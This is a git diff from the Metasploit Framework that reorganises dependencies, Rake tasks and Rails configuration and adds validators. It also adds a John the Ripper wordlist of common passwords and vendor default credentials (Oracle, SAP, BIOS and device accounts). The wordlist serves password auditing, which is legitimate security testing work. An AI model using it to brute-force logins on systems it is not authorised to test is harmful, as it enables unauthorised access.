diff --git a/.yardopts b/.yardopts
index eb3cff1cc2..b58b0bda2b 100644
--- a/.yardopts
+++ b/.yardopts
@@ -3,6 +3,8 @@
 --exclude \.ut\.rb/
 --exclude \.ts\.rb/
 --files CONTRIBUTING.md,COPYING,HACKING,LICENSE
+app/**/*.rb
 lib/msf/**/*.rb
+lib/metasploit/**/*.rb
 lib/rex/**/*.rb
 plugins/**/*.rb
diff --git a/Gemfile b/Gemfile
index 03c7fe7a01..d9c827c8a0 100755
--- a/Gemfile
+++ b/Gemfile
@@ -1,66 +1,53 @@
 source 'https://rubygems.org'
-
-# Need 3+ for ActiveSupport::Concern
-gem 'activesupport', '>= 3.0.0', '< 4.0.0'
-# Needed for some admin modules (cfme_manageiq_evm_pass_reset.rb)
-gem 'bcrypt'
-# Needed for some admin modules (scrutinizer_add_user.rb)
-gem 'json'
-# Needed for Meterpreter on Windows, soon others.
-gem 'meterpreter_bins', '0.0.6'
-# Needed by msfgui and other rpc components
-gem 'msgpack'
-# Needed by anemone crawler
-gem 'nokogiri'
-# Needed by db.rb and Msf::Exploit::Capture
-gem 'packetfu', '1.1.9'
-# Needed by JSObfu
-gem 'rkelly-remix', '0.0.6'
-# Needed by anemone crawler
-gem 'robots'
-# Needed for some post modules
-gem 'sqlite3'
+# Add default group gems to `metasploit-framework.gemspec`:
+#   spec.add_runtime_dependency '<name>', [<version requirements>]
+gemspec
 
 group :db do
   # Needed for Msf::DbManager
   gem 'activerecord', '>= 3.0.0', '< 4.0.0'
+  # Metasploit::Credential database models
+  gem 'metasploit-credential', '>= 0.8.6', '< 0.9'
   # Database models shared between framework and Pro.
-  gem 'metasploit_data_models', '0.17.0'
+  gem 'metasploit_data_models', '~> 0.19'
   # Needed for module caching in Mdm::ModuleDetails
   gem 'pg', '>= 0.11'
 end
 
+group :development do
+  # Markdown formatting for yard
+  gem 'redcarpet'
+  # generating documentation
+  gem 'yard'
+  # for development and testing purposes
+  gem 'pry'
+end
+
+group :development, :test do
+  # supplies factories for producing model instance for specs
+  # Version 4.1.0 or newer is needed to support generate calls without the
+  # 'FactoryGirl.' in factory definitions syntax.
+  gem 'factory_girl', '>= 4.1.0'
+  # automatically include factories from spec/factories
+  gem 'factory_girl_rails'
+  # Make rspec output shorter and more useful
+  gem 'fivemat', '1.2.1'
+  # running documentation generation tasks and rspec tasks
+  gem 'rake', '>= 10.0.0'
+  # testing framework
+  gem 'rspec', '>= 2.12', '< 3.0.0'
+  # Define `rake spec`.  Must be in development AND test so that its available by default as a rake test when the
+  # environment is development
+  gem 'rspec-rails' , '>= 2.12', '< 3.0.0'
+end
+
 group :pcap do
   gem 'network_interface', '~> 0.0.1'
   # For sniffer and raw socket modules
   gem 'pcaprub'
 end
 
-group :development do
-  # Markdown formatting for yard
-  gem 'redcarpet'
-  # generating documentation
-  gem 'yard'
-end
-
-group :development, :test do
-  # supplies factories for producing model instance for specs
-  # Version 4.1.0 or newer is needed to support generate calls without the
-  # 'FactoryGirl.' in factory definitions syntax.
-  gem 'factory_girl', '>= 4.1.0'
-  # Make rspec output shorter and more useful
-  gem 'fivemat', '1.2.1'
-  # running documentation generation tasks and rspec tasks
-  gem 'rake', '>= 10.0.0'
-end
-
 group :test do
-  # Removes records from database created during tests.  Can't use rspec-rails'
-  # transactional fixtures because multiple connections are in use so
-  # transactions won't work.
-  gem 'database_cleaner'
-  # testing framework
-  gem 'rspec', '>= 2.12'
   gem 'shoulda-matchers'
   # code coverage for tests
   # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
diff --git a/Gemfile.local.example b/Gemfile.local.example
index 9788ec95dc..1707e69605 100644
--- a/Gemfile.local.example
+++ b/Gemfile.local.example
@@ -27,8 +27,6 @@ end
 
 # Create a custom group
 group :local do
-  # Use pry to help view and interact with objects in the framework
-  gem 'pry', '~> 0.9'
   # Use pry-debugger to step through code during development
   gem 'pry-debugger', '~> 0.2'
   # Add the lab gem so that the 'lab' plugin will work again
diff --git a/Gemfile.lock b/Gemfile.lock
index 2fae393140..4d4b612d97 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,90 +1,177 @@
+PATH
+  remote: .
+  specs:
+    metasploit-framework (4.10.1.pre.dev)
+      actionpack (< 4.0.0)
+      activesupport (>= 3.0.0, < 4.0.0)
+      bcrypt
+      json
+      metasploit-model (~> 0.26.1)
+      meterpreter_bins (= 0.0.6)
+      msgpack
+      nokogiri
+      packetfu (= 1.1.9)
+      railties
+      rkelly-remix (= 0.0.6)
+      robots
+      rubyzip (~> 1.1)
+      sqlite3
+      tzinfo
+
 GEM
   remote: https://rubygems.org/
   specs:
-    activemodel (3.2.14)
-      activesupport (= 3.2.14)
+    actionpack (3.2.19)
+      activemodel (= 3.2.19)
+      activesupport (= 3.2.19)
       builder (~> 3.0.0)
-    activerecord (3.2.14)
-      activemodel (= 3.2.14)
-      activesupport (= 3.2.14)
+      erubis (~> 2.7.0)
+      journey (~> 1.0.4)
+      rack (~> 1.4.5)
+      rack-cache (~> 1.2)
+      rack-test (~> 0.6.1)
+      sprockets (~> 2.2.1)
+    activemodel (3.2.19)
+      activesupport (= 3.2.19)
+      builder (~> 3.0.0)
+    activerecord (3.2.19)
+      activemodel (= 3.2.19)
+      activesupport (= 3.2.19)
       arel (~> 3.0.2)
       tzinfo (~> 0.3.29)
-    activesupport (3.2.14)
+    activesupport (3.2.19)
       i18n (~> 0.6, >= 0.6.4)
       multi_json (~> 1.0)
-    arel (3.0.2)
+    arel (3.0.3)
+    arel-helpers (2.0.1)
+      activerecord (>= 3.1.0, < 5)
     bcrypt (3.1.7)
     builder (3.0.4)
-    database_cleaner (1.1.1)
-    diff-lcs (1.2.4)
-    factory_girl (4.2.0)
+    coderay (1.1.0)
+    diff-lcs (1.2.5)
+    erubis (2.7.0)
+    factory_girl (4.4.0)
       activesupport (>= 3.0.0)
+    factory_girl_rails (4.4.1)
+      factory_girl (~> 4.4.0)
+      railties (>= 3.0.0)
     fivemat (1.2.1)
-    i18n (0.6.5)
-    json (1.8.0)
-    metasploit_data_models (0.17.0)
-      activerecord (>= 3.2.13)
+    hike (1.2.3)
+    i18n (0.6.11)
+    journey (1.0.4)
+    json (1.8.1)
+    metasploit-concern (0.1.1)
+      activesupport (~> 3.0, >= 3.0.0)
+    metasploit-credential (0.8.6)
+      metasploit-concern (~> 0.1.0)
+      metasploit-model (~> 0.26.1)
+      metasploit_data_models (~> 0.19.4)
+      pg
+      rubyntlm
+      rubyzip (~> 1.1)
+    metasploit-model (0.26.1)
       activesupport
+    metasploit_data_models (0.19.4)
+      activerecord (>= 3.2.13, < 4.0.0)
+      activesupport
+      arel-helpers
+      metasploit-concern (~> 0.1.0)
+      metasploit-model (~> 0.26.1)
       pg
     meterpreter_bins (0.0.6)
-    mini_portile (0.5.1)
-    msgpack (0.5.5)
+    method_source (0.8.2)
+    mini_portile (0.6.0)
+    msgpack (0.5.8)
     multi_json (1.0.4)
     network_interface (0.0.1)
-    nokogiri (1.6.0)
-      mini_portile (~> 0.5.0)
+    nokogiri (1.6.3.1)
+      mini_portile (= 0.6.0)
     packetfu (1.1.9)
     pcaprub (0.11.3)
-    pg (0.16.0)
-    rake (10.1.0)
-    redcarpet (3.0.0)
+    pg (0.17.1)
+    pry (0.10.0)
+      coderay (~> 1.1.0)
+      method_source (~> 0.8.1)
+      slop (~> 3.4)
+    rack (1.4.5)
+    rack-cache (1.2)
+      rack (>= 0.4)
+    rack-ssl (1.3.4)
+      rack
+    rack-test (0.6.2)
+      rack (>= 1.0)
+    railties (3.2.19)
+      actionpack (= 3.2.19)
+      activesupport (= 3.2.19)
+      rack-ssl (~> 1.3.2)
+      rake (>= 0.8.7)
+      rdoc (~> 3.4)
+      thor (>= 0.14.6, < 2.0)
+    rake (10.3.2)
+    rdoc (3.12.2)
+      json (~> 1.4)
+    redcarpet (3.1.2)
     rkelly-remix (0.0.6)
     robots (0.10.1)
-    rspec (2.14.1)
-      rspec-core (~> 2.14.0)
-      rspec-expectations (~> 2.14.0)
-      rspec-mocks (~> 2.14.0)
-    rspec-core (2.14.5)
-    rspec-expectations (2.14.2)
+    rspec (2.99.0)
+      rspec-core (~> 2.99.0)
+      rspec-expectations (~> 2.99.0)
+      rspec-mocks (~> 2.99.0)
+    rspec-collection_matchers (1.0.0)
+      rspec-expectations (>= 2.99.0.beta1)
+    rspec-core (2.99.1)
+    rspec-expectations (2.99.2)
       diff-lcs (>= 1.1.3, < 2.0)
-    rspec-mocks (2.14.3)
-    shoulda-matchers (2.3.0)
-      activesupport (>= 3.0.0)
+    rspec-mocks (2.99.2)
+    rspec-rails (2.99.0)
+      actionpack (>= 3.0)
+      activemodel (>= 3.0)
+      activesupport (>= 3.0)
+      railties (>= 3.0)
+      rspec-collection_matchers
+      rspec-core (~> 2.99.0)
+      rspec-expectations (~> 2.99.0)
+      rspec-mocks (~> 2.99.0)
+    rubyntlm (0.4.0)
+    rubyzip (1.1.6)
+    shoulda-matchers (2.6.2)
     simplecov (0.5.4)
       multi_json (~> 1.0.3)
       simplecov-html (~> 0.5.3)
     simplecov-html (0.5.3)
+    slop (3.6.0)
+    sprockets (2.2.2)
+      hike (~> 1.2)
+      multi_json (~> 1.0)
+      rack (~> 1.0)
+      tilt (~> 1.1, != 1.3.0)
     sqlite3 (1.3.9)
-    timecop (0.6.3)
-    tzinfo (0.3.37)
-    yard (0.8.7)
+    thor (0.19.1)
+    tilt (1.4.1)
+    timecop (0.7.1)
+    tzinfo (0.3.40)
+    yard (0.8.7.4)
 
 PLATFORMS
   ruby
 
 DEPENDENCIES
   activerecord (>= 3.0.0, < 4.0.0)
-  activesupport (>= 3.0.0, < 4.0.0)
-  bcrypt
-  database_cleaner
   factory_girl (>= 4.1.0)
+  factory_girl_rails
   fivemat (= 1.2.1)
-  json
-  metasploit_data_models (= 0.17.0)
-  meterpreter_bins (= 0.0.6)
-  msgpack
+  metasploit-credential (>= 0.8.6, < 0.9)
+  metasploit-framework!
+  metasploit_data_models (~> 0.19)
   network_interface (~> 0.0.1)
-  nokogiri
-  packetfu (= 1.1.9)
   pcaprub
   pg (>= 0.11)
+  pry
   rake (>= 10.0.0)
   redcarpet
-  rkelly-remix (= 0.0.6)
-  robots
-  rspec (>= 2.12)
+  rspec (>= 2.12, < 3.0.0)
+  rspec-rails (>= 2.12, < 3.0.0)
   shoulda-matchers
   simplecov (= 0.5.4)
-  sqlite3
   timecop
   yard
diff --git a/Rakefile b/Rakefile
index 749f886717..232a7351b2 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,81 +1,11 @@
-require 'bundler/setup'
-
-pathname = Pathname.new(__FILE__)
-root = pathname.parent
-
-# add metasploit-framework/lib to load paths so rake files can just require
-# files normally without having to use __FILE__ and recalculating root and the
-# path to lib
-lib_pathname = root.join('lib')
-$LOAD_PATH.unshift(lib_pathname.to_s)
+#!/usr/bin/env rake
+require File.expand_path('../config/application', __FILE__)
+require 'metasploit/framework/require'
 
+# @note must be before `Metasploit::Framework::Application.load_tasks`
 #
-# load rake files like a rails engine
-#
+# define db rake tasks from activerecord if activerecord is in the bundle.  activerecord could be not in the bundle if
+# the user installs with `bundle install --without db`
+Metasploit::Framework::Require.optionally_active_record_railtie
 
-rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path
-
-Dir.glob(rakefile_glob) do |rakefile|
-  # Skip database tasks, will load them later if MDM is present
-  next if rakefile =~ /database\.rake$/
-  load rakefile
-end
-
-print_without = false
-
-begin
-	require 'rspec/core/rake_task'
-rescue LoadError
-	puts "rspec not in bundle, so can't set up spec tasks.  " \
-	     "To run specs ensure to install the development and test groups."
-
-	print_without = true
-else
-	RSpec::Core::RakeTask.new(:spec => 'db:test:prepare')
-
-	task :default => :spec
-end
-
-# Require yard before loading metasploit_data_models rake tasks as the yard tasks won't be defined if
-# YARD is not defined when yard.rake is loaded.
-begin
-  require 'yard'
-rescue LoadError
-	puts "yard not in bundle, so can't set up yard tasks.  " \
-	     "To generate documentation ensure to install the development group."
-
-	print_without = true
-end
-
-begin
-	require 'metasploit_data_models'
-rescue LoadError
-	puts "metasploit_data_models not in bundle, so can't set up db tasks.  " \
-	     "To run database tasks, ensure to install the db bundler group."
-
-	print_without = true
-else
-	load 'lib/tasks/database.rake'
-	metasploit_data_models_task_glob = MetasploitDataModels.root.join(
-			'lib',
-			'tasks',
-			'**',
-			'*.rake'
-	).to_s
-	# include tasks from metasplioit_data_models, such as `rake yard`.
-	# metasploit-framework specific yard options are in .yardopts
-	Dir.glob(metasploit_data_models_task_glob) do |path|
-		load path
-	end
-end
-
-
-
-if print_without
-	puts "Bundle currently installed " \
-	     "'--without #{Bundler.settings.without.join(' ')}'."
-	puts "To clear the without option do `bundle install --without ''` " \
-	     "(the --without flag with an empty string) or " \
-	     "`rm -rf .bundle` to remove the .bundle/config manually and " \
-	     "then `bundle install`"
-end
+Metasploit::Framework::Application.load_tasks
diff --git a/app/concerns/metasploit/credential/core/to_credential.rb b/app/concerns/metasploit/credential/core/to_credential.rb
new file mode 100644
index 0000000000..bfa804f1cb
--- /dev/null
+++ b/app/concerns/metasploit/credential/core/to_credential.rb
@@ -0,0 +1,23 @@
+# Adds associations to `Metasploit::Credential::Core` which are inverses of association on models under
+# {BruteForce::Reuse}.
+require 'metasploit/framework/credential'
+
+module Metasploit::Credential::Core::ToCredential
+  extend ActiveSupport::Concern
+  
+  included do
+    
+    def to_credential
+      Metasploit::Framework::Credential.new(
+        public:       public.try(:username), 
+        private:      private.try(:data), 
+        private_type: private.try(:type).try(:demodulize).try(:underscore).try(:to_sym), 
+        realm:        realm.try(:value), 
+        realm_key:    realm.try(:key),
+        parent:       self
+      )
+    end
+    
+  end
+  
+end
diff --git a/app/validators/metasploit.rb b/app/validators/metasploit.rb
new file mode 100644
index 0000000000..4733b4b1ed
--- /dev/null
+++ b/app/validators/metasploit.rb
@@ -0,0 +1,2 @@
+require 'metasploit/framework/file_path_validator'
+require 'metasploit/framework/executable_path_validator'
\ No newline at end of file
diff --git a/app/validators/metasploit/framework/executable_path_validator.rb b/app/validators/metasploit/framework/executable_path_validator.rb
new file mode 100644
index 0000000000..ce5450054d
--- /dev/null
+++ b/app/validators/metasploit/framework/executable_path_validator.rb
@@ -0,0 +1,16 @@
+module Metasploit
+  module Framework
+    # This is a ActiveModel custom validator that assumes the attribute
+    # is supposed to be the path to a regular file. It checks whether the
+    # file exists and whether or not it is an executable file.
+    class ExecutablePathValidator < ActiveModel::EachValidator
+
+      def validate_each(record, attribute, value)
+        unless ::File.executable? value
+          record.errors[attribute] << (options[:message] || "is not a valid path to an executable file")
+        end
+      end
+    end
+  end
+end
+
diff --git a/app/validators/metasploit/framework/file_path_validator.rb b/app/validators/metasploit/framework/file_path_validator.rb
new file mode 100644
index 0000000000..4b1f5381b1
--- /dev/null
+++ b/app/validators/metasploit/framework/file_path_validator.rb
@@ -0,0 +1,16 @@
+module Metasploit
+  module Framework
+    # This is a ActiveModel custom validator that assumes the attribute
+    # is supposed to be the path to a regular file. It checks whether the
+    # file exists and whether or not it is a regular file.
+    class FilePathValidator < ActiveModel::EachValidator
+
+      def validate_each(record, attribute, value)
+        unless ::File.file? value
+          record.errors[attribute] << (options[:message] || "is not a valid path to a regular file")
+        end
+      end
+    end
+  end
+end
+
diff --git a/config/application.rb b/config/application.rb
new file mode 100644
index 0000000000..0c3236cc7e
--- /dev/null
+++ b/config/application.rb
@@ -0,0 +1,58 @@
+require 'rails'
+require File.expand_path('../boot', __FILE__)
+
+all_environments = [
+    :development,
+    :production,
+    :test
+]
+
+Bundler.require(
+    *Rails.groups(
+        db: all_environments,
+        pcap: all_environments
+    )
+)
+
+#
+# Railties
+#
+
+# For compatibility with jquery-rails (and other engines that need action_view) in pro
+require 'action_view/railtie'
+
+#
+# Project
+#
+
+require 'metasploit/framework/common_engine'
+require 'msf/base/config'
+
+module Metasploit
+  module Framework
+    class Application < Rails::Application
+      include Metasploit::Framework::CommonEngine
+
+      environment_database_yaml = ENV['MSF_DATABASE_CONFIG']
+
+      if environment_database_yaml
+        # DO NOT check if the path exists: if the environment variable is set, then the user meant to use this path
+        # and if it doesn't exist then an error should occur so the user knows the environment variable points to a
+        # non-existent file.
+        config.paths['config/database'] = environment_database_yaml
+      else
+        user_config_root = Pathname.new(Msf::Config.get_config_root)
+        user_database_yaml = user_config_root.join('database.yml')
+
+        # DO check if the path exists as in test environments there may be no config root, in which case the normal
+        # rails location, `config/database.yml`, should contain the database config.
+        if user_database_yaml.exist?
+          config.paths['config/database'] = [user_database_yaml.to_path]
+        end
+      end
+    end
+  end
+end
+
+# Silence warnings about this defaulting to true
+I18n.enforce_available_locales = true
diff --git a/config/boot.rb b/config/boot.rb
new file mode 100644
index 0000000000..d1c7a63765
--- /dev/null
+++ b/config/boot.rb
@@ -0,0 +1,39 @@
+require 'pathname'
+require 'rubygems'
+
+GEMFILE_EXTENSIONS = [
+    '.local',
+    ''
+]
+
+msfenv_real_pathname = Pathname.new(__FILE__).realpath
+root = msfenv_real_pathname.parent.parent
+
+unless ENV['BUNDLE_GEMFILE']
+  require 'pathname'
+
+  GEMFILE_EXTENSIONS.each do |extension|
+    extension_pathname = root.join("Gemfile#{extension}")
+
+    if extension_pathname.readable?
+      ENV['BUNDLE_GEMFILE'] = extension_pathname.to_path
+      break
+    end
+  end
+end
+
+begin
+  require 'bundler'
+rescue LoadError
+  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
+  $stderr.puts "    $ gem install bundler"
+  exit(0)
+end
+
+Bundler.setup
+
+lib_path = root.join('lib').to_path
+
+unless $LOAD_PATH.include? lib_path
+  $LOAD_PATH.unshift lib_path
+end
diff --git a/config/environment.rb b/config/environment.rb
new file mode 100644
index 0000000000..4aa34124b9
--- /dev/null
+++ b/config/environment.rb
@@ -0,0 +1,5 @@
+# Load the rails application
+require File.expand_path('../application', __FILE__)
+
+# Initialize the rails application
+Metasploit::Framework::Application.initialize!
diff --git a/data/john/wordlists/common_roots.txt b/data/john/wordlists/common_roots.txt
new file mode 100644
index 0000000000..a2f113b3b1
--- /dev/null
+++ b/data/john/wordlists/common_roots.txt
@@ -0,0 +1,4724 @@
+
+!1qwerty
+!@#QWE123qwe
+!Q2w#E4r
+!Q2w3e4r
+!QAZ2wsx
+!QAZ2wsx#EDC4rfv
+!QAZ@WSX3edc4rfv
+!admin
+!ishtar
+!manage
+!qaz@wsx
+!qazXsw2
+!qwe123
+!root
+$SRV
+$chwarzepumpe
+$rfmngr$
+$secure$
+(random
+(unknown)
+*
+*3noguru
+*password
+--------
+0
+00
+000
+0000
+00000
+000000
+0000000
+00000000
+0000000000
+007007
+00850085
+010101
+010203
+012012
+012345
+0123456
+0123456789
+012465
+0392a0
+04051995
+0407056
+06061977
+06071992
+080808
+082208
+09090
+098765
+0987654321
+0P3N
+0RACLE
+0RACLE38
+0RACLE39
+0RACLE8
+0RACLE8I
+0RACLE9
+0okmnji9
+1
+10023
+101010
+10101010
+10111011
+10118
+10135
+10143
+10144
+102030
+1020304050
+1064
+11
+111
+1111
+11111
+111111
+1111111
+11111111
+1111111111
+11112222
+1111aa
+111222
+112233
+11223344
+116572
+12
+1212
+121212
+12121212
+12201220
+123
+123.com
+123123
+123123123
+123132123
+123258
+123321
+1234
+12341
+12341234
+123412345
+12345
+123454321
+123456
+1234567
+12345678
+123456789
+1234567890
+12345678900987654321
+1234567890987654321
+1234567890qwertyuiop
+12345678910
+1234567898
+12345678987
+123456789876
+1234567898765
+12345678987654
+123456789876543
+1234567898765432
+12345678987654321
+1234567899
+12345678998
+123456789987
+1234567899876
+12345678998765
+123456789987654
+1234567899876543
+12345678998765432
+123456789987654321
+12345678abc
+123456a
+1234ABCD
+1234Qwer
+1234admin
+1234qwer!
+1234qwer`
+123654
+123654789
+123789
+123abc
+123cztery
+123mudar
+123qwe
+123qwe!@#
+123qweASD
+123qweasdzxc
+123qwerty
+123zxc123
+124578
+125401
+12qw!@QW
+12qw34er
+12qwaszx
+130590
+1313
+131313
+1322222
+1340hd
+134679
+14111982
+141414
+142536
+143143
+14344
+1435254
+1456
+146688
+146890
+147147
+147258
+147258369
+147852
+147852369
+147896325
+1502
+151515
+1548644
+159357
+159357**
+159753
+159753456
+161616
+1660359
+166816
+17161716
+171717
+17201720
+17841784
+18140815
+181818
+187cop
+19491949
+19501950
+19511951
+1969
+19750407
+198624
+1986673
+1988
+19920706
+1997
+1a2s3d4f
+1keeper
+1lkjhgfdsa
+1q2w3e
+1q2w3e4R
+1q2w3e4r
+1q2w3e4r..
+1q2w3e4r5t
+1q2w3e4r5t6y
+1qa@WS3ed
+1qaz!QAZ
+1qaz"WSX
+1qaz0okm
+1qaz2wsx
+1qaz2wsx3edc
+1qaz@WSX
+1qazcde3
+1qazxcvb
+1qazxsw2
+1qsx2waz
+1qsx2wdc
+2
+2000
+2010
+201036
+20112011
+20132013
+202020
+20552055
+20562056
+20572057
+20682068
+2071184
+20742074
+21
+21101981
+2112
+21121477
+212121
+21241036
+22
+22071979
+222101
+2222
+22222
+222222
+22222222
+22242224
+225225
+23041979
+23051979
+232323
+23712371
+237723
+23skidoo
+24041975
+240653C9467E45
+242424
+24343
+246810
+2468369
+24Banc81
+2501
+2505463
+252525
+256256
+2580
+2594561
+266344
+2718281828
+282828
+29082908
+2WSXcder
+2bornot2b
+2brnot2b
+2cute4u
+2keeper
+2read
+3
+3098z
+311147
+31994
+321
+3333
+333333
+33333333
+3425235
+343guiltyspark
+3477
+3800326
+38483848
+3Com
+3ascotel
+3ep5w2u
+3l3ctr1c
+3stones
+3ware
+4
+420420
+43046721
+4321
+4444
+44444
+444444
+44444444
+456
+456123
+456789
+4636421
+493749
+4Dgifts
+4changes
+4getme2
+4rfv$RFV
+4rfv%TGB
+4rfvbhu8
+4tas
+4tugboat
+5
+50cent
+5150
+5201314
+54321
+545981
+5555
+55555
+555555
+55555555
+5583134
+56565656
+5678
+56789
+570912
+5777364
+57gbzb
+5832277
+584620
+589589
+5897
+589721
+6
+60020
+6071992
+6213744
+643558
+654321
+657
+666001
+6666
+666666
+66666666
+6922374
+6969
+696969
+69696969
+7
+735841
+741852
+741852963
+749174
+753951
+7654321
+7772000
+7777
+777777
+7777777
+77777777
+788111
+789456
+789456123
+8
+8111
+8253
+832531
+8429
+852456
+8675309
+874365
+87654321
+8888
+888888
+88888888
+8RttoTriz
+9
+9225481
+951753
+963258
+9641
+987654
+987654321
+9876543210
+9999
+99999
+999999
+99999999
+999999999
+9ijn7ygv
+?award
+@WSX1qaz
+A.M.I
+ABCD
+ACCESS
+ACCORD
+ADLDEMO
+ADMIN
+ADMIN welcome
+ADMINISTRATOR
+ADSUSER ch4ngeme
+ADS_AGENT ch4ngeme
+ADTRAN
+AIROPLANE
+ALLIN1
+ALLIN1MAIL
+ALLINONE
+AM
+AMI
+AMI!SW
+AMI.KEY
+AMI.KEZ
+AMI?SW
+AMIAMI
+AMIDECOD
+AMIPSWD
+AMISETUP
+AMI_SW
+AMI~
+ANS#150
+ANYCOM
+AP
+APC
+APPS
+APPS_MRC
+APPUSER
+AQ
+AQDEMO
+AQJAVA
+AQUSER
+AR#Admin#
+ARCHIVIST
+AUDIOUSER
+AWARD
+AWARD?SW
+AWARD_PW
+AWARD_SW
+Admin
+Admin1
+Admin123
+Admin@123
+Administrative
+Administrator
+Advance
+Airaya
+AitbISP4eCiG
+Aloysius
+Any
+Asante
+Ascend
+Asd123
+Asdfg123
+Aurora01
+Avalanche
+Award
+BACKUP
+BASE
+BATCH
+BC4J
+BIGO
+BIOS
+BIOSPASS
+BRIDGE
+BRIO_ADMIN
+Babylon
+Barricade
+Berman
+Biostar
+Boromir1
+C0de
+CALVIN
+CAROLIAN
+CATALOG
+CCC
+CDEMO82
+CDEMOCOR
+CDEMORID
+CDEMOUCB
+CENTRA
+CHANGE_ON_INSTALL
+CHEY_ARCHSVR
+CIDS
+CIS
+CISCO
+CISINFO
+CISSUS
+CLERK
+CLOTH
+CMOSPWD
+CMSBATCH
+CNAS
+COGNOS
+COMPANY
+COMPAQ
+COMPIERE
+CONCAT
+CONV
+CR52401
+CSMIG
+CTB_ADMIN sap123
+CTXDEMO
+CTXSYS
+CTX_123
+Cable-docsis
+Chester1
+Chocolate19
+Christmas
+Cisco
+Col2ogro2
+Compaq
+Compleri
+Congress
+Craftr4
+Crocodile1
+Crystal
+Crystal0!
+D-Link
+DBDCCIC
+DBSNMP
+DCL
+DDIC 19920706
+DDIC Welcome01
+DECMAIL
+DECNET
+DEFAULT
+DEMO
+DEMO8
+DEMO9
+DES
+DEV2000_DEMOS
+DEVELOPER ch4ngeme
+DIGITAL
+DIP
+DISC
+DISCOVERER_ADMIN
+DSGATEWAY
+DSL
+DSSYS
+D_SYSPW
+D_SYSTPW
+Daewuu
+Daytec
+Dell
+Dragonsoul
+EARLYWATCH SUPPORT
+EJSADMIN
+EMP
+ESSEX
+ESTORE
+EVENT
+EXFSYS
+Ektron
+Everything
+Exabyte
+FAX
+FAXUSER
+FAXWORKS
+FIELD
+FIELD.SUPPORT
+FINANCE
+FND
+FNDPUB
+FOOBAR
+FORCE
+FORSE
+Fireport
+Flamenco
+GATEWAY
+GL
+GPFD
+GPLD
+GUEST
+GUESTGUE
+GUESTGUEST
+GWrv
+Gateway
+Geardog
+George123
+GlobalAdmin
+Guest
+HARRIS
+HCPARK
+HELGA-S
+HELP
+HELPDESK
+HEWITT
+HLT
+HLW
+HOST
+HP
+HPDESK
+HPLASER
+HPOFFICE
+HPONLY
+HPP187
+HPP189
+HPP196
+HPWORD
+HR
+HTTP
+Haemorrhage
+Hamster
+Helpdesk
+IBM
+ILMI
+IMAGEUSER
+IMEDIA
+INFO
+INGRES
+INSTANCE
+INTERNAT
+INTX3
+INVALID
+IP
+IPMI
+ISPMODE
+IS_$hostname
+ITF3000
+ImageFolio
+Impatiens
+Insecure
+Intel
+Intermec
+Israel123
+J2EE_ADMIN ch4ngeme
+JDE
+JETSPEED
+JMUSER
+Joel1234
+KNIGHT
+Kia123
+Kitz
+L2LDEMO
+LASER
+LASERWRITER
+LBACSYS
+LINK
+LOTUS
+LR-ISDN
+LRISDN
+Lasvegas1
+LdapPassword_1
+Letmein1
+Letmein2
+Local
+LonDon
+Lund
+M
+M1cha3l
+MAIL
+MAILER
+MAINT
+MANAG3R
+MANAGER
+MANAGER.SYS
+MASTER
+MBIU0
+MBMANAGER
+MBWATCH
+MCUrv
+MCUser1
+MDDEMO
+MDSYS
+MFG
+MGR
+MGR.SYS
+MGWUSER
+MIGRATE
+MILLER
+MKO)9ijn
+MMO2
+MOREAU
+MPE
+MSHOME
+MServer
+MTRPW
+MTSSYS
+MTS_PASSWORD
+MUMBLEFRATZ
+MXAGENT
+MagiMFP
+Manager
+Master
+Mau'dib
+Mau?dib
+Mau’dib
+MiniAP
+Multi
+NAMES
+NAU
+NETBASE
+NETCON
+NETFRAME
+NETMGR
+NETNONPRIV
+NETPRIV
+NETSERVER
+NETWORK
+NEWINGRES
+NEWS
+NF
+NFI
+NICONEX
+NOC
+NONPRIV
+NTCIP
+NULL
+NeXT
+Nemesis1
+NetCache
+NetICs
+NetSeq
+NetSurvibox
+NetVCR
+Newpass1
+NoGaH$@!
+OAS_PUBLIC
+OCITEST
+OCS
+ODM
+ODS
+ODSCOMMON
+OE
+OEM
+OEMADM
+OEMREP
+OEM_TEMP
+OLAPDBA
+OO
+OOOOOOOO
+OP.OPERATOR
+OPENSPIRIT
+OPER
+OPERATIONS
+OPERATNS
+OPERATOR
+OPERVAX
+ORACL3
+ORACLE
+ORACLE8
+ORACLE8I
+ORACLE9
+ORAREGSYS
+ORASSO
+ORDPLUGINS
+ORDSYS
+OSP22
+OUTLN
+OWA
+OWA_PUBLIC
+OWNER
+OkiLAN
+Oper
+Operator
+OrigEquipMfr
+P4ssw0rd
+P@$$W0RD
+P@$$w0rD
+P@$$w0rd
+P@$$word
+P@55w0rd
+P@55w0rd!
+P@ssw0rd
+P@ssw0rd!
+P@ssword
+P@ssword123
+PANAMA
+PAPER
+PASS
+PASSW0RD
+PASSWORD
+PATROL
+PBX
+PDP11
+PDP8
+PERFSTAT
+PLEX
+PM
+PO
+PO7
+PO8
+PORTAL30
+PORTAL30_DEMO
+PORTAL30_PUBLIC
+PORTAL30_SSO
+PORTAL30_SSO_PS
+PORTAL30_SSO_PUBLIC
+PORTAL31
+POST
+POSTMASTER
+POWERCARTUSER
+PRIMARY
+PRINT
+PRINTER
+PRIV
+PRIVATE
+PRODCICS
+PRODDTA
+PROG
+PUBLIC
+PUBSUB
+PUBSUB1
+Pa22w0rd
+Parasol1
+Partner
+Pass1234
+PassW0rd
+Passw0rd1111
+Password
+Password#1
+Password1
+Password123
+Password@1
+PlsChgMe
+PlsChgMe!
+Polar123
+Polrty
+Posterie
+Private
+Protector
+Public
+Q!W@E#R$
+Q54arwms
+QAWSEDRF
+QDBA
+QDI
+QNX
+QS
+QSECOFR
+QSRV
+QSRVBAS
+QS_ADM
+QS_CB
+QS_CBADM
+QS_CS
+QS_ES
+QS_OS
+QS_WS
+QUSER
+Qwe12345
+Qwer!234
+Qwerty1!
+Qwerty123
+R1QTPS
+R3volution
+RE
+REGO
+REMOTE
+REPADMIN
+REPORT
+REP_OWNER
+RIP000
+RJE
+RM
+RMAIL
+RMAN
+ROBELLE
+ROOT
+ROOT500
+RSAAppliance
+RSX
+RUPRECHT
+ReadOnly
+ReadWrite
+Reptile1
+Republic1
+Rodopi
+Root123
+Runaway1
+Runner11
+SABRE
+SAMPLE
+SAP
+SAP* 06071992
+SAP* PASS
+SAPCPIC ADMIN
+SAPJSF ch4ngeme
+SAPR3
+SAPR3 SAP
+SDOS_ICSAP
+SECDEMO
